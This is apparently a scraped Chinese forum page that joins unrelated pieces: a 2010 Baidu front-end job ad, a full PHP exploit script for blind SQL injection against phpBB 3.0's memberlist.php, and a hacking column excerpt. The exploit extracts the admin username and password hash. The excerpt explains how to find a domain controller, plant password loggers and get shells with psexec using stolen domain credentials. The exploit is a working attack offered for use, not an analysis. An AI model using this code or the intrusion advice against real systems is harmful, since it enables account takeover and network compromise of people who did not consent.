
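[Recruitment] Baidu is hiring Web front-end R&D engineers

  • Location: Beijing
  • Years of experience: no requirement
  • Category: Front-end engineer
  • Posted: 2010/6/13
  • Deadline: 2010/12/31
  • Source: Lion

Job description
- Design, develop and implement Web-side functionality for Baidu product lines;
- Improve the interaction experience and optimize the performance of Baidu product interfaces;
- Research and build up knowledge of cutting-edge Web technologies

Requirements
- Bachelor's degree or above in computer science or a related field;
- Expert in Web development technologies such as JavaScript and Ajax;
- Expert in page-building technologies such as HTML/XHTML and CSS, familiar with page architecture and layout;
- Familiar with W3C standards, with a deep understanding of the separation of presentation and data, Web semantics, and so on;
- Proficient with Linux, with a grasp of algorithms, data structures and back-end development (PHP/Java, etc.);
- Strong interest in Internet products and Web technologies, good learning ability and a strong drive to improve;
- Good communication and expression skills, clear thinking, strong hands-on ability and logical analysis skills;

Contact
E-mail: stsr@baidu.com
(Tip: for best results, we suggest noting when you submit your resume that you came from 博客园)
Phone: 86-10-5992 5418
Mobile: 13164234669
Contact person: Mr. Zou
Company address: No. 10 Shangdi 10th Street, Haidian District, Beijing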

 

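非安全中国网 disclaimer:
1. All statements and images in this post are solely the poster's personal opinions and have nothing to do with this site's position;
2. This topic was posted by 悟空ing; the poster 悟空ing complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster 悟空ing and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site; the purpose of reposting is to pass on more information and does not mean this site endorses the views or is responsible for their authenticity;
5. If this post infringes your site's or your personal copyright, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.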

All I can do is look at this job posting and sigh.
    What I studied has turned out to be a real tragedy.

PHPBB 3.0 0day vulnerability released
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by Hackerz5 hackerz5x@yahoo.com\n";
echo "site: http://hackerz5.com\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\n"; $exa.="\n";}
}
return $exa."\n".$result;
}
$proxy_regex = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\n";
$packet.="Content-Type: application/x-www-form-urlencoded\n";
$packet.="Accept-Encoding: text/plain\n";
$packet.="Host: ".$host."\n";
$packet.="Content-Length: ".strlen($data)."\n";
$packet.="Connection: Close\n\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\n";
$packet.="Content-Type: application/x-www-form-urlencoded\n";
$packet.="Host: ".$host."\n";
$packet.="Content-Length: ".strlen($data)."\n";
$packet.="Connection: Close\n";
$packet.="Cookie: ".$cookie."\n\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\n";
$packet.="Content-Type: application/x-www-form-urlencoded\n";
$packet.="Host: ".$host."\n";
$packet.="Content-Length: ".strlen($data)."\n";
$packet.="Connection: Close\n";
$packet.="Cookie: ".$cookie."\n\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\n";
$packet.="Content-Type: application/x-www-form-urlencoded\n";
$packet.="Host: ".$host."\n";
$packet.="Content-Length: ".strlen($data)."\n";
$packet.="Connection: Close\n";
$packet.="Cookie: ".$cookie."\n\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\n";
echo "admin -> ".$admin."\n";
echo "password (md5) -> ".$password."\n";
echo "--------------------------------------------------------------------\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.


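Finding the primary domain server on an internal network
Faced with a domain-structured internal network, many newcomers may not have the experience to know how to penetrate it. If you can get the primary domain administrator's password, you can move freely through the entire internal network. The primary domain administrator usually stays on the more important machines; if you can take over one or a few of them and plant something like a password logger, I believe you will get the password sooner or later. The primary domain server is of course the most important of these machines, so how do you work out which one it is among thousands of machines? A DOS command such as ●net group "domain admins" /domain● can serve as one criterion, but VBS can do it too. This still falls under ADSI, and the code is as follows:
★
set obj=GetObject("LDAP://rootDSE")
wscript.echo obj.servername
★
These two lines of code are all that is needed; run ●cscript 3.vbs● and you will get a result. Of course, whether you use the DOS command or VBS, the prerequisite is that you are running with a domain user's privileges. For example, if you have obtained a domain user's account and password, you can use the form psexec.exe -u -p cmd.exe to get a shell as the domain user; or, if your trojan already interacts with the desktop and the one logged in to your trojan's shell is a domain user, you can run these commands directly. The role of VBS in intrusions is of course not limited to this, and JS or other tools can also do what my code above does; but the title set for this column is clever uses of VBS in hacking, so we only discuss VBS. After finishing the VBS part, the other authors and I will go on planning other topics for later columns and try to bring readers good, useful articles.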
